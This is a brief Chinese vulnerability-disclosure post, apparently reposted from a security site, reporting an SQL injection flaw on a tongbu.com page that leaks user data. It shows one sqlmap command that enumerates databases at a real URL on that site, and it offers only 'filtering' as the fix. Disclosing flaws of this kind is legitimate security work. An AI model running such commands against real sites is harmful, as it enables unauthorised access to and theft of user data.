同步网某分站存在sql注入下载

来源:黑吧安全网 浏览:880次 时间:2014-04-29
做网站找雨过天晴工作室

同步网某页面SQL注入漏洞(泄漏用户各种信息)

D:\Python>python.exe e:\Tools\sqlmap\sqlmap.py -u "http://app.tongbu.com/gift/li

st.html?key=*" --dbs --level 3

修复方案:

过滤